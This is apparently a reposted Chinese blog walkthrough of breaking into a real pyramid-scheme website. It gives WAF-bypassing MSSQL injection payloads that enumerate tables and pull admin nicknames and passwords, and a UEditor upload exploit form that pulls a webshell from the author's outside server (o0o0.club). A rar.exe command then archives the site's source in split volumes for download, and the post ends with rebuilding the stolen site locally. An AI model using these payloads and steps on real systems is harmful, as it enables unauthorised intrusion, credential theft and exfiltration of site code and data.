pythom打包文件太大_从SQL注入到整站打包与本地搭建
一、前言
如題,由于是在已知有一處sql注入的情況下才接手進(jìn)行的后續(xù)操作,因此前面信息搜集則一筆帶過。
二、信息搜集
目標(biāo)是個(gè)本地的傳銷站點(diǎn)其大致信息為IIS+ASP.NET+安全狗、騰訊云。
三、Bypass Sql
3.1 Fuzz
空格 error 加號(hào) 未攔截 等號(hào) error 單引號(hào) error 雙引號(hào) 未攔截 雙括號(hào) 未攔截 +select error %0bselect 未攔截 %0bselect%0buser%0bfrom 未攔截 %0bselect%0buser%0bfrom%0badmin 攔截 convert() 未攔截根據(jù)如上測(cè)試可以看出程序本身也有過濾,error為程序自身的過濾。可以利用IIS處理%符號(hào)的機(jī)制繞過部分符號(hào),例如空格使用%0b 加號(hào)使用%2b等。再根據(jù)測(cè)試的結(jié)果,可以先利用convert轉(zhuǎn)換報(bào)錯(cuò)獲取一部分信息。
goodscontent.aspx?gid=convert(int,@@version)#版本信息 goodscontent.aspx?gid=convert(int,db_name())#數(shù)據(jù)庫信息 goodscontent.aspx?gid=convert(int,user_name())#當(dāng)前數(shù)據(jù)庫用戶 …… tips:可以通過遍歷db_name(1)中的數(shù)字獲取其他庫名得到以下信息:
ASP.NET 版本:Microsoft .NET Framework 版本:4.0.30319; ASP.NET 版本:4.0.30319.36400 數(shù)據(jù)庫版本:Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (X64) 用戶名:sa 計(jì)算機(jī)名:10_*_76_*SQLEXPRESS 10.*.76.* 當(dāng)前庫:pan20170823 所有庫名: pan20170823 master tempdb model msdb ReportServer$SQLEXPRESS ReportServer$SQLEXPRESSTempDB再往下就是獲取表的信息
goodscontent.aspx?gid=CONVERT(INT,(CHAR(58)%2bCHAR(58)%2b(SELECT%0btop%0b1%0bCAST(COUNT(*)%0bAS%0bnvarchar(4000))%0bFROM%0binformation_schema.TABLES%0b)%2bCHAR(58)%2bCHAR(58)))#獲取表總個(gè)數(shù)由于我只會(huì)簡(jiǎn)單的select from因此始終無法獲取表名,如果有其他姿勢(shì)還望給科普下。
3.2 萬金油
此時(shí)陷入僵局,后來想起在404大佬的一篇bypass安全狗的文章中提到過在mssql中注釋加換行同樣成立,遂構(gòu)造之。
goodscontent.aspx?gid=--/*%0a(select%0btop%0b1%0btable_name%0bFROM%0binformation_schema.tables%0b)--%20*/ PS:由于注入點(diǎn)已經(jīng)使用了convert做了數(shù)據(jù)轉(zhuǎn)換,后續(xù)直接防入查詢即可獲取到第一個(gè)表名:jsrecord
由于還是沒能繞過單引號(hào)和等號(hào),我始終用不了not in與for xml path來爆后續(xù)的表名,這又觸及到了我知識(shí)盲區(qū),因此只好查閱大量文章案例,最終構(gòu)造出如下語句。
/goodscontent.aspx?gid=--/*%0a(SELECT%0bTOP%0b1%0btable_name%0bFROM%0binformation_schema.tables%0bWHERE%0btable_name%0bNOT%0bIN(SELECT%0bTOP%0b11%0btable_name%0bFROM%0binformation_schema.columns))--%20*/此時(shí)只需要遍歷top的數(shù)值即可,例如:
/goodscontent.aspx?gid=--/*%0a(SELECT%0bTOP%0b1%0btable_name%0bFROM%0binformation_schema.tables%0bWHERE%0btable_name%0bNOT%0bIN(SELECT%0bTOP%0b80%0btable_name%0bFROM%0binformation_schema.columns))--%20*/通過不斷的遍歷數(shù)值發(fā)現(xiàn)還是存在問題,舉個(gè)例子,即 1-20、200-209,334-345返回同一個(gè)表名,存在大量重復(fù)與無序的情況,但可以通過burp中intruder->Grep-Extact功能來解決,操作如下: 首先設(shè)置好intruder對(duì)001-600進(jìn)行遍歷(超過600多后就沒什么內(nèi)容了)
然后使用Grep-Extact提取表名。
保存結(jié)果后去重即可。
和前面獲取到的表總個(gè)數(shù)是一致的。
解下來就是獲取memberadmin表中的列名與內(nèi)容,但在此之前我還是習(xí)慣性的看了下后臺(tái)的網(wǎng)頁源代碼。
如圖,盲猜列名txt_nickname、nickname、txt_password、password
/goodscontent.aspx?gid=--/*%0a(select%0btop%0b1%0bnickname%0bfrom%0bmemberadmin)--%20*//goodscontent.aspx?gid=--/*%0a(select%0btop%0b1%0bpassword%0bfrom%0bmemberadmin)--%20*/三、后臺(tái)getshell
登陸后臺(tái)
經(jīng)測(cè)試后發(fā)現(xiàn)信息管理處可以發(fā)布咨詢,上傳圖片。通過修改去掉filename="1.aspx"中的雙引號(hào)繞過安全狗,但無法繞過程序自身的檢測(cè)。
Content-Disposition: form-data; name="up_picture"; filename=xss.jpg .aspx不過得知上傳組件為ueditor,且.net版本存在上傳漏洞 poc如下
<form action="http://***/***/net/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded" method="POST"> <p>shell addr:<input type="text" name="source[]" /></p > <input type="submit" value="Submit" /> </form>并在自己的服務(wù)器上準(zhǔn)備好shell(注意過狗),名稱為a.gif,然后填入shell地址
https://o0o0.club/a.gif?.aspx提交后即可得到shell路徑
四、打包源碼與數(shù)據(jù)庫
在有了shell之后要做的事情就更明確了,即是打包源碼與數(shù)據(jù)庫,由于只需要這兩樣操作,相對(duì)于不需要太大的權(quán)限,避免操作不當(dāng)觸發(fā)警告。因此我選擇先通過shell來進(jìn)行打包操作。
源碼
這里利用的是自行上傳的rar.exe來分卷打包源碼,在此之前嘗試過7z.exe(目標(biāo)服務(wù)器上已安裝)、makecab 但效果并不理想,姿勢(shì)不夠還望科普。
rar.exe a -r -v50m -m5 pan20170823 *.* #a 壓縮 #-r 打包子目錄 #-v 分卷大小 #-m 壓縮等級(jí) #pan20170823目標(biāo)目錄 #*.* 打包后文件名為 pan20170823.part*.rar最終以每秒100k的速度下載完成。
數(shù)據(jù)庫
略過,后臺(tái)自帶備份功能
坑點(diǎn):后臺(tái)的備份文件后綴為zip,下載回來總是提示文件損壞,一直以為備份功能有問題,后來發(fā)現(xiàn)文件頭是TAPE。。。。
五、本地搭建
本地搭建的環(huán)境為 Windows server 2012+IIS8+SQL Server 2008,簡(jiǎn)單講講0.0
SQL Server
安裝過程略過 導(dǎo)入數(shù)據(jù)
新建數(shù)據(jù)庫,然后通過原設(shè)備還原數(shù)據(jù)
還原成功
IIS與http://ASP.NET
安裝一筆帶過,左邊拉滿就行,簡(jiǎn)單粗暴
添加站點(diǎn)
最好對(duì)應(yīng)目標(biāo)版本
修改源碼中的配置文件
訪問
創(chuàng)作挑戰(zhàn)賽新人創(chuàng)作獎(jiǎng)勵(lì)來咯,堅(jiān)持創(chuàng)作打卡瓜分現(xiàn)金大獎(jiǎng)總結(jié)
以上是生活随笔為你收集整理的pythom打包文件太大_从SQL注入到整站打包与本地搭建的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Java极光推送
- 下一篇: awr报告分析 mysql_AWR报告的